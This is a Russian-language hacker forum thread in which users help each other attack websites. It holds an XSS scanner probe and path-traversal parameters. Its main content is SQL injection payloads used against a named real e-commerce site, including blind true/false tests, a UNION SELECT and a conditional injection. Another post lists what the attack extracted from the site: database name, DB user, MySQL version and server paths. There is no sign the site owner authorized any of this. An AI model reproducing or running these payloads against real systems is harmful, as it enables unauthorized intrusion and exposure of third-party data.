Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Я ненавижу лето из-за таких вопросов.
    1. SQL-инъекции и PROCEDURE ANALYSE() (c) Raz0r.
    Но работает реально редко.
    2. Бруть.
    3. Только в 5 и выше версии mysql, есть information_schema.
    4. Удали свой аккаунт с античата.
     
  2. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    Блин, мне уже до неприличия надоело задавать нубские вопросы. Сам не догоняю ((
    На запрос:
    /index.php?axn=1'
    вылазит
    на запрос:
    /index.php?do=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22&name=1&[email protected]&p=1&axn=1&query=1
    (это уже из сканера)

    выдает
    Внимание, вопрос)) Уязвим?
    И еще.
    На запрос www.site.com/admin/ вылазит не админка, а какой то код на всю страницу (100500 скролов)
    Вот кусочек:
     
  3. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    /index.php?name=../index.php&p=../index.php&axn=1&query=../index.php
    А вообще есть способ ещё один, по кол-ву вопросов в этой теме, который некто незнает.
    Наз-ся вывод через ошибку ****...
     
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    EoGeneo,DrakonSerg....


    "Господа, задающие вопросы:
    хватит ПИСАТЬ, попробуйте сначала хоть что-то ЧИТАТЬ !!!" (с) Jokester
     
    #13364 Gorev, 4 Jun 2010
    Last edited: 4 Jun 2010
  5. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    где почитать, уважаемый? Я кроме инфы, что нужно выводить через юнион селект или ордер би инфы не нашел.
    Я бы с удовольствием сам бы поучился, но хз где учиться
     
  6. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    https://forum.antichat.ru/showpost.php?p=407227&postcount=3
    Топик с маном по скулям.
     
    1 person likes this.
  7. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    Ладно вопрос по другому поствлю.
    GROUP_CONCAT() - С помошью этого запроса в 5 ветке мускула можно получить список таблиц бд.
    Какой запрос используется для получения списка в 4 ветке мускула.
     
  8. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    О МАЙ ГАД Ты непобедим!
    Кури маны, чо такое group_concat().
    Если следовать твоей логике, то concat_ws специально mysql разработчики сделали для хакеров, ну мол там user(),database(),version() выводить одним запросом, а так же юзеров, пассы и т.п.
    Извеняюсь забыл ещё.
    [​IMG]
     
    #13368 Ctacok, 4 Jun 2010
    Last edited: 4 Jun 2010
    1 person likes this.
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    спусти тормозную жидкость...почитай ман по скулям... не раз уже тыкали носом в ман, неужели не хватает смелости все таки почитать что нибудь оттуда? тебе же сказали что информационная схема есть только в 5 версии мускула, а в 4 надо подбирать брутом..для этого есть куча утилит.. гугл тебе в помощь
     
    1 person likes this.
  10. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    Спасибо, разобрался.
    +
     
  11. haito

    haito Banned

    Joined:
    27 May 2010
    Messages:
    23
    Likes Received:
    1
    Reputations:
    1
    привет команде;

    http://beinoma.com/details.php?prodid=974%27 <-не показывать изображения

    я пробовал много методов, но никакого результата
    Как можно "inject" этот сайт :confused:
     
  12. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    c чего вы взяли что там inject...
     
  13. haito

    haito Banned

    Joined:
    27 May 2010
    Messages:
    23
    Likes Received:
    1
    Reputations:
    1
    Я думаю, что что-то не по запросу, которые делают изображение не показали
    Верно ли это?
     
  14. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    То что там инекция этот вопрос под самнением.
    А второе, там еще и ошибки отключены.
     
  15. gromoza

    gromoza Member

    Joined:
    21 Dec 2008
    Messages:
    7
    Likes Received:
    6
    Reputations:
    0
    Дак попробуй написать
    http://beinoma.com/details.php?prodid=974+and+1=1-- если отобразит
    http://beinoma.com/details.php?prodid=974+and+1=2--
    не отобразит, то крути как слепую.
     
  16. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    молчал бы горе хакер...я утром тебе рекомендовал читать маны..так вот читай и не пости глупости, если ошибки нет это еще не значит что иньекции нет..

    http://beinoma.com/details.php?prodid=547&cid=1'
    Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/p14tnu81/public_html/details.php on line 57

    http://beinoma.com/details.php?prodid=547&cid=1+union+select+1,2,3,4,5--
     
    #13376 Gorev, 4 Jun 2010
    Last edited: 4 Jun 2010
  17. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://beinoma.com/details.php?prodid=547&cid=if((select+substring(version(),1,1)=5),1,(select+1+union+select+2))
    
    POST=y
    
    @@basedir: /
    @@tmpdir: /tmp/
    database(): p14tnu81_beipoa
    @@datadir: /var/lib/mysql/
    version(): 5.0.67-community
    @@version_compile_os: redhat-linux-gnu
    user(): p14tnu81@localhost
    
     
  18. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    вы дяденька зря сердитесь на человека.... и вообще вы можете отличать параметр prodid от параметра сid? автор указал именно параметр prodid
     
    1 person likes this.
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    никто ни на кого не сердится...солдат ребенка не обидит как говорится.. и причем здесь параметр пропид или сид? разговор шел о скуле..нате вам скулю...а пашкела вам на блюдечке предоставил...
    P.S. с отличалкой у меня пока все нормально...
    P.S.2 и к чему ваш пост написан совсем непонятно...
     
    1 person likes this.
  20. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    Кстати да. задачи найти скулю на сайте небыло.
    Был указан определенный параметр - собственно в нем и искали.
     
Thread Status:
Not open for further replies.